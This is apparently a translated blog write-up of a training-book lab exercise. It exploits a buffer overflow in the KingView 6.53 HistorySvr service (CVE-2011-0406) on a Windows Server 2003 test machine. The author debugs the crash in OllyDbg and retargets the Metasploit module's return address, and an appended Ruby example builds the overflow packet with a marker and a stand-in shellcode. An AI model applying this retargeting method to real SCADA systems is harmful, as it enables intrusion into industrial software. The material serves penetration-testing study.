"Metasploit Penetration Testing Devil Training Camp" target machine exercises, Chapter 5 practical case: KingView 6.53, CVE-2011-0406

Running two virtual machines on my laptop is sluggish and awkward, so I put the Metasploit target machine on a separate physical machine and configured its IP address by hand.

Target host: 192.168.137.254

Attacker: 192.168.137.253

Vulnerable software on the target: KingView 6.53 (CVE-2011-0406), running on Windows Server 2003 SP0.

Now to the point:

During information gathering, port 777 was found open on the target host. A quick search (Baidu) shows that this port belongs to the KingView HistorySvr service, which has a known vulnerability.

Searching msf directly for an exploit module for this vulnerability turns up nothing.

So I found an exploit module online, dropped it into exploits/windows/scada, and checked the source: the targets table contains no entry for Windows 2003 SP0.

With no better option, I first tried the Windows XP SP3 target to see whether it happens to work anyway.

Configuration process:

Check whether a reverse connection comes back:

No session comes back, so the XP SP3 target does not work here.

Back on the target host to debug. After that attack, HistorySvr.exe had stopped running, which shows that the vulnerability was triggered but the shellcode never ran: the hijacked jump did not land on the shellcode, and control eventually fell through to the system's default exception handler.

Open OllyDbg, go to Options > Just-in-time debugging, click "Make OllyDbg just-in-time debugger", and exit. Restart the HistorySvr service and attack again. This time OllyDbg catches the exception and the program stops on the faulting instruction.

The cause: the faulting instruction is a call that reads its target from [eax+0x0C], and the memory at eax+0x0C has never been allocated, so the read raises an access violation.

Back in the module source, the targets table shows that the return address Ret for the "Windows XP SP3 EN" target is exactly the value now in EAX, 0x00A1FB84. So after the overflow, the Ret from the packet does overwrite EAX, but on this system that address does not point at the shellcode. All that needs to change is Ret.

First the shellcode has to be located in memory. Add a new target to the module with an arbitrary Ret, and in the exploit function insert a distinctive marker string into the overflow packet, keeping the total packet length unchanged so that the overflow itself behaves exactly as before.

Close OllyDbg, restart the service, and attack again:

Back on the target, OllyDbg caught the exception again. Searching memory for the marker "ABAC" finds it at 0x00B404C0, so the shellcode, which immediately follows the 4-byte marker, starts at 0x00B404C4.

Now just update Ret for the new target and adjust the exploit function accordingly:

Reload the module and attack again: success.
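To make the marker step above concrete, here is an added example in Ruby, the language of Metasploit modules. It is not code from this page or from the KingView exploit module. The packet layout (filler length, total length, field order) and the target table are assumptions for illustration only, not the real CVE-2011-0406 packet format; only the Ret values and the "ABAC" marker come from the page. It builds the overflow buffer with the marker in place while keeping the total length fixed, and turns the address at which the debugger finds the marker into the shellcode address, generalising the 0x00B404C0 to 0x00B404C4 step.

```ruby
# Added example, not from the page or the Metasploit module. PAD_LEN, TOTAL_LEN
# and the field order are a hypothetical stand-in for the real CVE-2011-0406
# packet; the Ret values and the marker string are the ones the page reports.

# Target table in the style of a Metasploit module's 'Targets' list.
TARGETS = {
  'Windows XP SP3 EN'         => { 'Ret' => 0x00A1FB84 }, # original module's value
  'Windows 2003 SP0 (locate)' => { 'Ret' => 0x41414141 }, # arbitrary, only to find the shellcode
  'Windows 2003 SP0'          => { 'Ret' => 0x00B404C4 }, # address found in OllyDbg
}

TOTAL_LEN = 1024   # assumed fixed packet length; never change it between runs
PAD_LEN   = 200    # assumed bytes of filler before the overwritten pointer
MARKER    = 'ABAC' # locating characters, chosen so they cannot occur in the 'A' filler

# Build the overflow packet: [filler][Ret][4-byte slot][shellcode][filler to TOTAL_LEN].
# The 4-byte slot holds MARKER for the locating run and NOPs for the real attack,
# so the shellcode sits at the same offset, and therefore the same address, in both.
def build_packet(ret, shellcode, slot: "\x90" * MARKER.bytesize)
  raise "slot must be #{MARKER.bytesize} bytes" unless slot.bytesize == MARKER.bytesize
  buf = ('A' * PAD_LEN).b
  buf << [ret].pack('V')        # Ret as a little-endian DWORD, as Metasploit does
  buf << slot.b
  buf << shellcode.b
  raise "packet too long: #{buf.bytesize} > #{TOTAL_LEN}" if buf.bytesize > TOTAL_LEN
  buf << ('C' * (TOTAL_LEN - buf.bytesize)).b   # pad to the constant length
  buf
end

# Offset of the marker inside the packet (what you expect to see in the memory dump).
def marker_offset(packet, marker = MARKER)
  packet.index(marker.b)
end

# Translate the address at which the debugger's memory search found the marker
# into the address of the shellcode that immediately follows it.
def shellcode_addr_from_marker(marker_addr, marker = MARKER)
  marker_addr + marker.bytesize
end

if __FILE__ == $0
  shellcode = ("\x90" * 16 + "\xcc").b   # constructed stand-in (NOP sled + int3), not a real payload
  locate = build_packet(TARGETS['Windows 2003 SP0 (locate)']['Ret'], shellcode, slot: MARKER)
  printf("locating packet: %d bytes, marker at offset 0x%x\n", locate.bytesize, marker_offset(locate))
  printf("marker seen at 0x%08X -> shellcode at 0x%08X\n", 0x00B404C0, shellcode_addr_from_marker(0x00B404C0))
  final = build_packet(TARGETS['Windows 2003 SP0']['Ret'], shellcode)
  printf("final packet: %d bytes, Ret bytes %s\n", final.bytesize, final[PAD_LEN, 4].unpack1('H*'))
end
```

The point of the fixed-size slot is the caveat this page's method relies on: the address the debugger reports is only valid for the packet layout that produced it. If the marker were simply deleted from the final packet, the shellcode would move four bytes earlier and the freshly found Ret would miss it again.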


Source: blog.csdn.net/2301_77162959/article/details/130900620